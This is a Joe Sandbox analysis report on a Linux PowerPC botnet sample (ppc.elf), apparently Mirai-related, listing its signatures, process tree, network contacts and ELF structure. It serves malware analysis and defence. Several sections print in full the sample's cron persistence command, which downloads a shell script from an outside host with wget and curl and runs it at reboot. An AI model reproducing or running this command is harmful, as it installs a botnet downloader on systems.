Edit tour

Linux Analysis Report
ppc.elf

Overview

General Information

Sample name:	ppc.elf
Analysis ID:	1557034
MD5:	c6f057c974b24f6abdac5b76b10040b9
SHA1:	80295c6fdf8fff202829732e58428d656b38f6bd
SHA256:	4e114c1111ecdaf0a7622a347c025cd3f9584be170b129113d836a2a5a7c169f
Tags:	elfuser-abuse_ch
Infos:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false

Signatures

Multi AV Scanner detection for submitted file

Connects to many ports of the same IP (likely port scanning)

Executes the "crontab" command typically for achieving persistence

Sample tries to persist itself using cron

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Found strings indicative of a multi-platform dropper

Sample has stripped symbol table

Sample listens on a socket

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1557034
Start date and time:	2024-11-17 05:37:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	ppc.elf
Detection:	MAL
Classification:	mal60.troj.linELF@0/1@74/0

Runtime Messages

Command:	/tmp/ppc.elf
PID:	6232
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	you are now apart of hail cock botnet
Standard Error:	no crontab for root

Process Tree

system is lnxubuntu20

ppc.elf (PID: 6232, Parent: 6156, MD5: ae65271c943d3451b7f026d1fadccea6) Arguments: /tmp/ppc.elf

ppc.elf New Fork (PID: 6234, Parent: 6232)

sh (PID: 6234, Parent: 6232, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"

sh New Fork (PID: 6240, Parent: 6234)

sh New Fork (PID: 6242, Parent: 6240)

crontab (PID: 6242, Parent: 6240, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l

sh New Fork (PID: 6241, Parent: 6234)

crontab (PID: 6241, Parent: 6234, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -

ppc.elf New Fork (PID: 6243, Parent: 6232)

ppc.elf New Fork (PID: 6294, Parent: 6243)

ppc.elf New Fork (PID: 6298, Parent: 6243)

ppc.elf New Fork (PID: 6245, Parent: 6232)

ppc.elf New Fork (PID: 6255, Parent: 6232)

cleanup

Yara Signatures

⊘No yara matches

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: ppc.elf

ReversingLabs: Detection: 15%

Source: tmp.mMQot8.18.dr

String: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 5.39.254.71 ports 17443,19337,1,3,7,9
Source: global traffic	TCP traffic: 217.28.130.41 ports 8375,1,2,3,6,22361
Source: global traffic	TCP traffic: 193.233.193.45 ports 20243,0,2,2645,3,4,9559
Source: global traffic	TCP traffic: 27.102.118.111 ports 0,3,3806,6,8,5448
Source: global traffic	TCP traffic: 107.189.8.204 ports 0,1,2,3,7,10732,9805
Source: global traffic	TCP traffic: 91.149.238.18 ports 1919,0,4,5,5940,9

Source: global traffic	TCP traffic: 192.168.2.23:44314 -> 91.149.218.232:19337
Source: global traffic	TCP traffic: 192.168.2.23:33870 -> 5.39.254.71:19337
Source: global traffic	TCP traffic: 192.168.2.23:57478 -> 107.189.8.204:10732
Source: global traffic	TCP traffic: 192.168.2.23:33644 -> 91.149.238.18:5940
Source: global traffic	TCP traffic: 192.168.2.23:35430 -> 45.147.200.148:1593
Source: global traffic	TCP traffic: 192.168.2.23:33724 -> 194.87.30.79:8994
Source: global traffic	TCP traffic: 192.168.2.23:38800 -> 194.58.66.244:5859
Source: global traffic	TCP traffic: 192.168.2.23:41734 -> 27.102.118.110:21211
Source: global traffic	TCP traffic: 192.168.2.23:48800 -> 31.13.248.13:19943
Source: global traffic	TCP traffic: 192.168.2.23:60298 -> 31.13.248.89:6968
Source: global traffic	TCP traffic: 192.168.2.23:48676 -> 195.133.53.106:7149
Source: global traffic	TCP traffic: 192.168.2.23:53580 -> 193.233.193.45:20243
Source: global traffic	TCP traffic: 192.168.2.23:41898 -> 209.141.49.186:5268
Source: global traffic	TCP traffic: 192.168.2.23:47098 -> 45.140.168.235:7894
Source: global traffic	TCP traffic: 192.168.2.23:42236 -> 217.28.130.41:22361
Source: global traffic	TCP traffic: 192.168.2.23:43756 -> 86.107.100.80:22606
Source: global traffic	TCP traffic: 192.168.2.23:41148 -> 89.32.41.42:19303
Source: global traffic	TCP traffic: 192.168.2.23:47094 -> 213.182.204.57:19113
Source: global traffic	TCP traffic: 192.168.2.23:57666 -> 27.102.118.111:3806
Source: global traffic	TCP traffic: 192.168.2.23:59544 -> 209.141.61.182:5787

Source: /tmp/ppc.elf (PID: 6232)

Socket: 127.0.0.1:1172

Jump to behavior

Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.149.218.232
Source: unknown	TCP traffic detected without corresponding DNS query: 91.149.218.232
Source: unknown	TCP traffic detected without corresponding DNS query: 91.149.218.232
Source: unknown	TCP traffic detected without corresponding DNS query: 91.149.218.232
Source: unknown	TCP traffic detected without corresponding DNS query: 5.39.254.71
Source: unknown	TCP traffic detected without corresponding DNS query: 5.39.254.71
Source: unknown	TCP traffic detected without corresponding DNS query: 5.39.254.71
Source: unknown	TCP traffic detected without corresponding DNS query: 5.39.254.71
Source: unknown	TCP traffic detected without corresponding DNS query: 91.149.218.232
Source: unknown	TCP traffic detected without corresponding DNS query: 5.39.254.71
Source: unknown	TCP traffic detected without corresponding DNS query: 5.39.254.71
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 107.189.8.204
Source: unknown	TCP traffic detected without corresponding DNS query: 107.189.8.204
Source: unknown	TCP traffic detected without corresponding DNS query: 107.189.8.204
Source: unknown	TCP traffic detected without corresponding DNS query: 107.189.8.204
Source: unknown	TCP traffic detected without corresponding DNS query: 91.149.238.18
Source: unknown	TCP traffic detected without corresponding DNS query: 91.149.238.18
Source: unknown	TCP traffic detected without corresponding DNS query: 91.149.238.18
Source: unknown	TCP traffic detected without corresponding DNS query: 91.149.238.18
Source: unknown	TCP traffic detected without corresponding DNS query: 107.189.8.204
Source: unknown	TCP traffic detected without corresponding DNS query: 107.189.8.204
Source: unknown	TCP traffic detected without corresponding DNS query: 45.147.200.148
Source: unknown	TCP traffic detected without corresponding DNS query: 45.147.200.148
Source: unknown	TCP traffic detected without corresponding DNS query: 45.147.200.148
Source: unknown	TCP traffic detected without corresponding DNS query: 45.147.200.148
Source: unknown	TCP traffic detected without corresponding DNS query: 45.147.200.148
Source: unknown	TCP traffic detected without corresponding DNS query: 45.147.200.148
Source: unknown	TCP traffic detected without corresponding DNS query: 45.147.200.148
Source: unknown	TCP traffic detected without corresponding DNS query: 45.147.200.148
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 91.149.238.18
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknown	TCP traffic detected without corresponding DNS query: 194.87.30.79
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.66.244
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.66.244
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.66.244
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.66.244
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.66.244
Source: unknown	TCP traffic detected without corresponding DNS query: 194.58.66.244

Source: global traffic

DNS traffic detected: DNS query: kingstonwikkerink.dyn

Source: tmp.mMQot8.18.dr

String found in binary or memory: http://hailcocks.ru/wget.sh;

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal60.troj.linELF@0/1@74/0

Persistence and Installation Behavior

Executes the "crontab" command typically for achieving persistence

Source: /bin/sh (PID: 6242)	Crontab executable: /usr/bin/crontab -> crontab -l			Jump to behavior
Source: /bin/sh (PID: 6241)	Crontab executable: /usr/bin/crontab -> crontab -			Jump to behavior

Sample tries to persist itself using cron

Source: /usr/bin/crontab (PID: 6241)	File: /var/spool/cron/crontabs/tmp.mMQot8			Jump to behavior
Source: /usr/bin/crontab (PID: 6241)	File: /var/spool/cron/crontabs/root			Jump to behavior

Source: /tmp/ppc.elf (PID: 6294)	File opened: /proc/6065/cmdline	Jump to behavior
Source: /tmp/ppc.elf (PID: 6294)	File opened: /proc/6373/status	Jump to behavior
Source: /tmp/ppc.elf (PID: 6294)	File opened: /proc/6384/status	Jump to behavior
Source: /tmp/ppc.elf (PID: 6294)	File opened: /proc/6372/status	Jump to behavior
Source: /tmp/ppc.elf (PID: 6294)	File opened: /proc/6383/status	Jump to behavior
Source: /tmp/ppc.elf (PID: 6294)	File opened: /proc/6375/status	Jump to behavior
Source: /tmp/ppc.elf (PID: 6294)	File opened: /proc/6374/status	Jump to behavior
Source: /tmp/ppc.elf (PID: 6294)	File opened: /proc/6385/status	Jump to behavior
Source: /tmp/ppc.elf (PID: 6294)	File opened: /proc/6355/status	Jump to behavior
Source: /tmp/ppc.elf (PID: 6294)	File opened: /proc/6377/status	Jump to behavior
Source: /tmp/ppc.elf (PID: 6294)	File opened: /proc/6376/status	Jump to behavior
Source: /tmp/ppc.elf (PID: 6294)	File opened: /proc/6368/status	Jump to behavior
Source: /tmp/ppc.elf (PID: 6294)	File opened: /proc/6379/status	Jump to behavior
Source: /tmp/ppc.elf (PID: 6294)	File opened: /proc/6367/status	Jump to behavior
Source: /tmp/ppc.elf (PID: 6294)	File opened: /proc/6378/status	Jump to behavior
Source: /tmp/ppc.elf (PID: 6294)	File opened: /proc/6380/status	Jump to behavior
Source: /tmp/ppc.elf (PID: 6294)	File opened: /proc/6371/status	Jump to behavior
Source: /tmp/ppc.elf (PID: 6294)	File opened: /proc/6382/status	Jump to behavior
Source: /tmp/ppc.elf (PID: 6294)	File opened: /proc/6370/status	Jump to behavior
Source: /tmp/ppc.elf (PID: 6294)	File opened: /proc/6381/status	Jump to behavior
Source: /tmp/ppc.elf (PID: 6294)	File opened: /proc/6336/status	Jump to behavior
Source: /tmp/ppc.elf (PID: 6294)	File opened: /proc/6369/status	Jump to behavior

Source: /tmp/ppc.elf (PID: 6234)

Shell command executed: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"

Jump to behavior

Source: submitted sample

Stderr: no crontab for root: exit code = 0

Source: /tmp/ppc.elf (PID: 6232)

Queries kernel information via 'uname':

Jump to behavior

Source: ppc.elf, 6232.1.0000562348aeb000.0000562348bc0000.rw-.sdmp, ppc.elf, 6243.1.0000562348aeb000.0000562348bc0000.rw-.sdmp, ppc.elf, 6245.1.0000562348aeb000.0000562348bc0000.rw-.sdmp	Binary or memory string: !/etc/qemu-binfmt/ppc1
Source: ppc.elf, 6232.1.00007fff2c9e7000.00007fff2ca08000.rw-.sdmp, ppc.elf, 6243.1.00007fff2c9e7000.00007fff2ca08000.rw-.sdmp, ppc.elf, 6245.1.00007fff2c9e7000.00007fff2ca08000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-ppc/tmp/ppc.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/ppc.elf
Source: ppc.elf, 6232.1.0000562348aeb000.0000562348bc0000.rw-.sdmp, ppc.elf, 6243.1.0000562348aeb000.0000562348bc0000.rw-.sdmp, ppc.elf, 6245.1.0000562348aeb000.0000562348bc0000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/ppc
Source: ppc.elf, 6232.1.00007fff2c9e7000.00007fff2ca08000.rw-.sdmp, ppc.elf, 6243.1.00007fff2c9e7000.00007fff2ca08000.rw-.sdmp, ppc.elf, 6245.1.00007fff2c9e7000.00007fff2ca08000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-ppc

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Scheduled Task/Job	Direct Volume Access	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Scripting	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ppc.elf	16%	ReversingLabs	Linux.Backdoor.Mirai

Dropped Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
kingstonwikkerink.dyn	unknown	unknown	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://hailcocks.ru/wget.sh;	tmp.mMQot8.18.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
217.28.130.41	unknown	United Kingdom	15839	COBWEB-NETGB	true
194.58.66.244	unknown	Russian Federation	2118	RELCOM-ASRelcomGroup19022019RU	false
194.87.30.79	unknown	Russian Federation	2118	RELCOM-ASRelcomGroup19022019RU	false
213.182.204.57	unknown	Latvia	9009	M247GB	false
27.102.118.110	unknown	Korea Republic of	45996	GNJ-AS-KRDAOUTECHNOLOGYKR	false
193.233.193.45	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	true
27.102.118.111	unknown	Korea Republic of	45996	GNJ-AS-KRDAOUTECHNOLOGYKR	true
31.13.248.89	unknown	Bulgaria	34224	NETERRA-ASBG	false
86.107.100.80	unknown	Romania	38995	AMG-ASRO	false
195.133.53.106	unknown	Russian Federation	21453	FLEX-ASRU	false
91.149.238.18	unknown	Poland	41952	MARTON-ASPL	true
45.147.200.148	unknown	Russian Federation	51659	ASBAXETRU	false
45.140.168.235	unknown	Russian Federation	51659	ASBAXETRU	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false
5.39.254.71	unknown	United Kingdom	30938	ABSTATIONwwwabstationnetGB	true
209.141.61.182	unknown	United States	53667	PONYNETUS	false
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
91.149.218.232	unknown	Poland	198401	GECKONET-ASPL	false
31.13.248.13	unknown	Bulgaria	34224	NETERRA-ASBG	false
107.189.8.204	unknown	United States	53667	PONYNETUS	true
209.141.49.186	unknown	United States	53667	PONYNETUS	false
89.32.41.42	unknown	Romania	48874	HOSTMAZEHOSTMAZERO	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
217.28.130.41	mpsl.elf	Get hash	malicious	Unknown	Browse
	arm5.elf	Get hash	malicious	Unknown	Browse
	ppc.elf	Get hash	malicious	Unknown	Browse
	harm4.elf	Get hash	malicious	Unknown	Browse
	harm5.elf	Get hash	malicious	Unknown	Browse
	nsharm.elf	Get hash	malicious	Unknown	Browse
	nshppc.elf	Get hash	malicious	Unknown	Browse
	nshmips.elf	Get hash	malicious	Unknown	Browse
	harm4.elf	Get hash	malicious	Unknown	Browse
	mpsl.elf	Get hash	malicious	Unknown	Browse
194.58.66.244	hmips.elf	Get hash	malicious	Unknown	Browse
194.87.30.79	hmips.elf	Get hash	malicious	Unknown	Browse
213.182.204.57	hmips.elf	Get hash	malicious	Unknown	Browse
	mips.elf	Get hash	malicious	Unknown	Browse
	arm7.elf	Get hash	malicious	Unknown	Browse
	nsharm7.elf	Get hash	malicious	Unknown	Browse
	nshmips.elf	Get hash	malicious	Unknown	Browse
	harm5.elf	Get hash	malicious	Unknown	Browse
	mpsl.elf	Get hash	malicious	Unknown	Browse
	arm5.elf	Get hash	malicious	Unknown	Browse
	arm4.elf	Get hash	malicious	Unknown	Browse
	mpsl.elf	Get hash	malicious	Unknown	Browse
193.233.193.45	hmips.elf	Get hash	malicious	Unknown	Browse
	arm7.elf	Get hash	malicious	Unknown	Browse
	harm4.elf	Get hash	malicious	Unknown	Browse
	harm5.elf	Get hash	malicious	Unknown	Browse
	nshsh4.elf	Get hash	malicious	Unknown	Browse
	nsharm5.elf	Get hash	malicious	Unknown	Browse
	nsharm.elf	Get hash	malicious	Unknown	Browse
	nshppc.elf	Get hash	malicious	Unknown	Browse
	nshmips.elf	Get hash	malicious	Unknown	Browse
	arm7.elf	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
M247GB	hmips.elf	Get hash	malicious	Unknown	Browse	213.182.204.57
	file.exe	Get hash	malicious	NetSupport RAT	Browse	45.61.128.74
	file.exe	Get hash	malicious	NetSupport RAT	Browse	45.61.128.74
	yhYrGCKq9s.exe	Get hash	malicious	RedLine	Browse	91.202.233.18
	meerkat.arm.elf	Get hash	malicious	Mirai	Browse	38.201.237.116
	botnet.x86.elf	Get hash	malicious	Mirai, Moobot	Browse	38.207.55.160
	mips.elf	Get hash	malicious	Unknown	Browse	213.182.204.57
	arm7.elf	Get hash	malicious	Unknown	Browse	213.182.204.57
	bin.sh.elf	Get hash	malicious	Mirai	Browse	45.88.100.118
	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	38.206.146.185
RELCOM-ASRelcomGroup19022019RU	hmips.elf	Get hash	malicious	Unknown	Browse	194.87.30.79
	Supply Contract 12 Additional Agreement to 76_24_.exe	Get hash	malicious	GuLoader, Remcos	Browse	194.58.83.68
	lchs.exe	Get hash	malicious	Quasar	Browse	193.124.33.141
	jKira.arm	Get hash	malicious	Mirai	Browse	195.133.54.44
GNJ-AS-KRDAOUTECHNOLOGYKR	sh4.elf	Get hash	malicious	Mirai	Browse	14.129.24.157
	nuklear.arm.elf	Get hash	malicious	Mirai, Moobot	Browse	1.18.64.186
	arm5.elf	Get hash	malicious	Mirai	Browse	1.17.85.123
	sh4.elf	Get hash	malicious	Mirai	Browse	1.17.85.151
	x86.elf	Get hash	malicious	Mirai, Moobot	Browse	115.71.116.179
	la.bot.sh4.elf	Get hash	malicious	Unknown	Browse	27.102.158.214
	botnet.mips.elf	Get hash	malicious	Mirai, Moobot	Browse	27.103.206.241
	czHBnd67gp.elf	Get hash	malicious	Unknown	Browse	1.17.85.185
	la.bot.arm.elf	Get hash	malicious	Unknown	Browse	27.103.36.59
	la.bot.sh4.elf	Get hash	malicious	Unknown	Browse	1.17.37.240
RELCOM-ASRelcomGroup19022019RU	hmips.elf	Get hash	malicious	Unknown	Browse	194.87.30.79
	Supply Contract 12 Additional Agreement to 76_24_.exe	Get hash	malicious	GuLoader, Remcos	Browse	194.58.83.68
	lchs.exe	Get hash	malicious	Quasar	Browse	193.124.33.141
	jKira.arm	Get hash	malicious	Mirai	Browse	195.133.54.44
COBWEB-NETGB	mpsl.elf	Get hash	malicious	Unknown	Browse	217.28.130.41
	arm5.elf	Get hash	malicious	Unknown	Browse	217.28.130.41
	ppc.elf	Get hash	malicious	Unknown	Browse	217.28.130.41
	harm4.elf	Get hash	malicious	Unknown	Browse	217.28.130.41
	harm5.elf	Get hash	malicious	Unknown	Browse	217.28.130.41
	nsharm.elf	Get hash	malicious	Unknown	Browse	217.28.130.41
	nshppc.elf	Get hash	malicious	Unknown	Browse	217.28.130.41
	nshmips.elf	Get hash	malicious	Unknown	Browse	217.28.130.41
	harm4.elf	Get hash	malicious	Unknown	Browse	217.28.130.41
	mpsl.elf	Get hash	malicious	Unknown	Browse	217.28.130.41

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

/var/spool/cron/crontabs/tmp.mMQot8

Download File

Process:	/usr/bin/crontab
File Type:	ASCII text
Category:	dropped
Size (bytes):	306
Entropy (8bit):	5.175269048372245
Encrypted:	false
SSDEEP:	6:SUrpqoqQjEOP1KmREJOBFQpZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXsJovc:8QjHig8PeHLUHYC+GABjnOGAFkz
MD5:	085E162608B96E698756F196C4E79DEA
SHA1:	618E3D80363A8F4952189EFE6D9C853EA13F3510
SHA-256:	203117181E74E7106DC73B5494AEB2A39B96E5742FB1B7585CE87C9D5D2943B7
SHA-512:	5E8B2EF917CC56831C36B858624FA7F1EE42F51582A866D945BC3A21A3D1D25BC6A0671132C18A220221F218D9E937704D38DD9C9CA6075E067319341D7A23E5
Malicious:	true
Reputation:	low
Preview:	# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Sat Nov 16 22:37:54 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.

Static File Info

General

File type:	ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.263720563579231
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	ppc.elf
File size:	77'536 bytes
MD5:	c6f057c974b24f6abdac5b76b10040b9
SHA1:	80295c6fdf8fff202829732e58428d656b38f6bd
SHA256:	4e114c1111ecdaf0a7622a347c025cd3f9584be170b129113d836a2a5a7c169f
SHA512:	23a3bda5842b7e4e0abb6601c5c692d88ebe70c9ebe292d58ee5731aa34647b277ba46b893bcc2481be510442170118e29294a604c6ec296a2712316d09261e6
SSDEEP:	1536:/N1w60+jmqw2+GsHimydhuYmXHeWOaIq1+Vrq/bki8:/g60L6hlE1HeWlIjC8
TLSH:	B3734B42B30C0947C1A75DF03A3F17D093BEAA9121E4F784655FAB4A92B6E321586FCD
File Content Preview:	.ELF...........................4..-......4. ...(......................)...)...............)...)...).......T.........dt.Q.............................!..\|......$H...H......$8!. \|...N.. .!..\|.......?.........-$..../...@..\?.....)4.+../...A..$8...})....)4N..

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, big endian
Version:	1 (current)
Machine:	PowerPC
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x100001f0
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	77056
Section Header Size:	40
Number of Section Headers:	12
Header String Table Index:	11

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x10000094	0x94	0x24	0x0	0x6	AX	4
.text	PROGBITS	0x100000b8	0xb8	0x10df0	0x0	0x6	AX	4
.fini	PROGBITS	0x10010ea8	0x10ea8	0x20	0x0	0x6	AX	4
.rodata	PROGBITS	0x10010ec8	0x10ec8	0x1a4c	0x0	0x2	A	8
.ctors	PROGBITS	0x10022918	0x12918	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x10022920	0x12920	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x10022930	0x12930	0x344	0x0	0x3	WA	8
.sdata	PROGBITS	0x10022c74	0x12c74	0x40	0x0	0x3	WA	4
.sbss	NOBITS	0x10022cb4	0x12cb4	0x70	0x0	0x3	WA	4
.bss	NOBITS	0x10022d24	0x12cb4	0x508c	0x0	0x3	WA	4
.shstrtab	STRTAB	0x0	0x12cb4	0x4b	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x10000000	0x10000000	0x12914	0x12914	6.3036	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0x12918	0x10022918	0x10022918	0x39c	0x5498	3.0282	0x6	RW	0x10000	.ctors .dtors .data .sdata .sbss .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 17, 2024 05:37:58.682070971 CET	42836	443	192.168.2.23	91.189.91.43
Nov 17, 2024 05:37:59.453969002 CET	42516	80	192.168.2.23	109.202.202.202
Nov 17, 2024 05:38:11.197628021 CET	44314	19337	192.168.2.23	91.149.218.232
Nov 17, 2024 05:38:11.202677965 CET	19337	44314	91.149.218.232	192.168.2.23
Nov 17, 2024 05:38:11.202759981 CET	44314	19337	192.168.2.23	91.149.218.232
Nov 17, 2024 05:38:11.202855110 CET	44314	19337	192.168.2.23	91.149.218.232
Nov 17, 2024 05:38:11.207757950 CET	19337	44314	91.149.218.232	192.168.2.23
Nov 17, 2024 05:38:11.207813978 CET	44314	19337	192.168.2.23	91.149.218.232
Nov 17, 2024 05:38:11.212697983 CET	19337	44314	91.149.218.232	192.168.2.23
Nov 17, 2024 05:38:11.443178892 CET	33870	19337	192.168.2.23	5.39.254.71
Nov 17, 2024 05:38:11.448139906 CET	19337	33870	5.39.254.71	192.168.2.23
Nov 17, 2024 05:38:11.448194981 CET	33870	19337	192.168.2.23	5.39.254.71
Nov 17, 2024 05:38:11.448296070 CET	33870	19337	192.168.2.23	5.39.254.71
Nov 17, 2024 05:38:11.453114986 CET	19337	33870	5.39.254.71	192.168.2.23
Nov 17, 2024 05:38:11.453171015 CET	33870	19337	192.168.2.23	5.39.254.71
Nov 17, 2024 05:38:11.458058119 CET	19337	33870	5.39.254.71	192.168.2.23
Nov 17, 2024 05:38:11.785866022 CET	19337	44314	91.149.218.232	192.168.2.23
Nov 17, 2024 05:38:11.786052942 CET	44314	19337	192.168.2.23	91.149.218.232
Nov 17, 2024 05:38:11.792759895 CET	19337	44314	91.149.218.232	192.168.2.23
Nov 17, 2024 05:38:12.340387106 CET	19337	33870	5.39.254.71	192.168.2.23
Nov 17, 2024 05:38:12.340560913 CET	33870	19337	192.168.2.23	5.39.254.71
Nov 17, 2024 05:38:12.340764999 CET	33870	19337	192.168.2.23	5.39.254.71
Nov 17, 2024 05:38:13.016077995 CET	43928	443	192.168.2.23	91.189.91.42
Nov 17, 2024 05:38:16.816617012 CET	57478	10732	192.168.2.23	107.189.8.204
Nov 17, 2024 05:38:16.821690083 CET	10732	57478	107.189.8.204	192.168.2.23
Nov 17, 2024 05:38:16.821872950 CET	57478	10732	192.168.2.23	107.189.8.204
Nov 17, 2024 05:38:16.821873903 CET	57478	10732	192.168.2.23	107.189.8.204
Nov 17, 2024 05:38:16.826972961 CET	10732	57478	107.189.8.204	192.168.2.23
Nov 17, 2024 05:38:16.827061892 CET	57478	10732	192.168.2.23	107.189.8.204
